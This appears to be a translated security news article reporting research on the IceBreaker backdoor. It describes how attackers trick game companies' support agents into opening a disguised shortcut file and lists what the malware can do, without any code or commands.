Thursday, March 28, 2024
HomeSECURITYHackers Use New IceBreaker Malware to Hack Gaming Companies

Hackers Use New IceBreaker Malware to Hack Gaming Companies

-


Hackers Use New IceBreaker Malware to Hack Gaming Companies

Once again, social engineering is in play, this time the attackers are fooling support agents.

Hacker groups have targeted online game development companies with a never-before-seen backdoor that the researchers have dubbed “IceBreaker”.

Incident response specialists Security Joes believe that the IceBreaker backdoor uses “a very specific social engineering technique.” The method is based on deceiving support agents. An attacker pretends to be a user who has encountered a problem and sends a malicious screenshot to an employee in a chat. Tom has no choice but to download and open the file, because you need to help the user. This is how the support agent infects his computer with a virus.



IceBreaker Distribution and Activation Scheme (Security Joes)

The name of the group behind these attacks is still unknown. However, according to Security Joes, this group has been using this approach since at least September 2022. At the same time, the only public evidence of the use of IceBreaker is Twitter post from MalwareHunterTeam in October.

The malicious image is usually hosted on a fake website that pretends to be one of the popular hosts. Although the researchers also saw that the malicious screenshots were stored in the normal Dropbox storage.

The “image” itself is actually a malicious “.lnk” file. In fact, this is a regular Windows shortcut with malicious code in its parameters.



Label disguised as a “.jpg” image

As you can see in the image above, the shortcut icon has been changed to look innocuous. The shortcut contains the command to download payload in the “.msi” format from the attacker’s server, its hidden installation and launch without a user interface.

Further along the path “AppData\Local\Temp”, the malicious application “Port.exe”, a 64-bit C++ executable file, is extracted.



Port.exe File Properties

After a thorough analysis, Security Joes specialists found out that the sample is a completely new backdoor written in Node.js. It provides attackers with the following options:

  • setting up a backdoor using plugins that extend its built-in functions;
  • prescribing a backdoor to Windows startup;
  • Windows process detection;
  • stealing passwords and cookies from local storage, in particular from Google Chrome;
  • enable Socks5 reverse proxy;
  • uploading files to a remote server via web sockets;
  • running custom VBS scripts;
  • creating screenshots;
  • creating remote shell sessions.

If the target organization has not outsourced the customer support service to an external provider, but does it itself, attackers can use the backdoor to steal credentials, move in the internal network and expand their presence in it.

Not much is currently known about IceBreaker, but Security Joes decided to publish this report and share all indicators of compromise found (IoC) to help antivirus companies learn how to identify and remediate threats in a timely manner.





Source link

www.securitylab.ru

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Most Popular